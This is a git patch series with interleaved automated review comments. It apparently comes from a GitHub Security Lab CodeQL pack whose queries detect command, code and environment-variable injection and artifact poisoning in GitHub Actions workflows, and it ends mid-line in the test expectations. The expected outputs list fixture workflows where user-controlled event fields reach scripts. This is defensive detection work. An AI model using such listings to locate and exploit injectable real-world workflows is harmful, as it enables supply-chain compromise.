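Review bot: The first branch of the new `where` condition already holds for every workflow whose only trigger is `workflow_call`, so the second branch never narrows anything: `not isSingleTriggerWorkflow(w, "pull_request")` is true for a `workflow_call`-only workflow whether or not a matching caller exists. A reusable workflow that is called only from `pull_request` workflows is therefore still reported, which contradicts the comment on the second branch. Excluding that case in the first branch restores the stated intent: `not isSingleTriggerWorkflow(w, "pull_request") and not isSingleTriggerWorkflow(w, "workflow_call")`. The same two-branch condition is carried over unchanged into `Workflow.isPrivileged()` in `ql/lib/codeql/actions/Ast.qll` by the later "Centralize isPrivileged decisions" commit, so the correction applies there as well. The remainder of the query, including its `select`, lies outside the hunk.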
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.4 +version: 0.0.5 groups: - actions - queries From 2988bc8885d51529ea9b998076e8b3744e27fd28 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:00 +0200 Subject: [PATCH 0145/1267] Centralize isPrivileged decisions --- ql/lib/codeql/actions/Ast.qll | 21 +++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 7 +- ql/src/Security/CWE-077/EnvVarInjection.ql | 11 ++- .../CWE-077/PrivilegedEnvVarInjection.ql | 13 ++- ql/src/Security/CWE-078/CommandInjection.ql | 11 ++- .../CWE-078/PrivilegedCommandInjection.ql | 13 ++- ql/src/Security/CWE-094/CodeInjection.ql | 11 ++- .../CWE-094/PrivilegedCodeInjection.ql | 13 ++- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 +---- ql/src/Security/CWE-829/UntrustedCheckout.ql | 19 +--- .../Security/CWE-077/EnvVarInjection.expected | 1 - .../CWE-078/CommandInjection.expected | 1 - .../Security/CWE-094/CodeInjection.expected | 87 ------------------- 13 files changed, 75 insertions(+), 155 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d865eb54905..17768245fdc 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -35,6 +35,8 @@ class AstNode instanceof AstNodeImpl { Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } + CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } 
@@ -123,6 +125,25 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(string t | this.getATriggerEvent() = t | t) = 1 + } + + predicate isPrivileged() { + // The Workflow is triggered by an event other than `pull_request` + not this.hasSingleTrigger("pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not caller.hasSingleTrigger("pull_request") + ) + } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a1470a41dd0..3f9293bc972 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -95,10 +95,15 @@ abstract class AstNodeImpl extends TAstNode { JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } /** - * Gets the enclosing workflow statement. + * Gets the enclosing workflow if any. */ WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + /** + * Gets the enclosing composite action if any. + */ + CompositeActionImpl getEnclosingCompositeAction() { this = result.getAChildNode*() } + /** * Gets a environment variable expression by name in the scope of the current node. */ diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2e978ad9e53..e758932b208 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql 
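Review bot: `hasSingleTrigger` and `isPrivileged` are added to the public `Workflow` class without QLDoc, and `isPrivileged` is a stronger name than what the body checks: it looks only at trigger events and does not consult `getPermissions()`, which is declared a few lines above in the same class. Six queries now depend on this predicate to choose between the privileged and non-privileged variants, so the approximation should be stated where it is defined. Suggested comments: `/** Holds if `trigger` is the only event that triggers this workflow. */` on `hasSingleTrigger`, and on `isPrivileged` a QLDoc saying that it holds when the workflow has any trigger other than a sole `pull_request`, or is a `workflow_call`-only workflow with such a caller, and that declared `permissions` are not taken into account. The `Workflow` class begins outside the hunk.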
@@ -17,7 +17,16 @@ import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink -where EnvVarInjectionFlow::flowPath(source, sink) +where + EnvVarInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 6508b458629..811a6f65c7c 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,16 +16,13 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() 
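Review bot: The `exists(source.getNode().asExpr().getEnclosingCompositeAction())` branch reports every composite-action source in this non-privileged query, while `PrivilegedEnvVarInjection.ql` in the same commit only matches sources that have an enclosing workflow, so a composite action is presumably never classified as privileged, whichever workflow uses it. If that is intended, the branch should carry a comment saying so, e.g. `// Composite actions have no trigger of their own; the calling workflow is not resolved here, so they are always reported by this query`. The same condition is repeated verbatim in the `CommandInjection.ql` and `CodeInjection.ql` hunks of this commit; a shared predicate next to `Workflow.isPrivileged()` would keep the three queries from drifting apart. The `select` clause at the end of the hunk is unchanged context.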
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 826a3b41e38..de60141bb40 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -17,7 +17,16 @@ import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink -where CommandInjectionFlow::flowPath(source, sink) +where + CommandInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index 2f9a09f59c3..bbfb226ecd1 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql 
@@ -16,16 +16,13 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index f71c178822c..dc28cc2569f 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -19,7 +19,16 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink -where CodeInjectionFlow::flowPath(source, sink) +where + CodeInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 62030e32263..9814df091dd 100644 
--- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,16 +18,13 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b71a64d52e..5d38faa94df 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
@@ -14,27 +14,9 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep download, Step run where - w = job.getWorkflow() and - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + job.getWorkflow().isPrivileged() and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 86b80c67215..40f6d2fec9e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
@@ -121,26 +121,9 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - from Workflow w, PRHeadCheckoutStep checkout where - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + w.isPrivileged() and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 2d96ec5a435..d5dbcbde086 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | 
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index decabad082f..99ebb1edc05 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1fad288860e..6cb2c1ed399 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -209,92 +209,5 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ 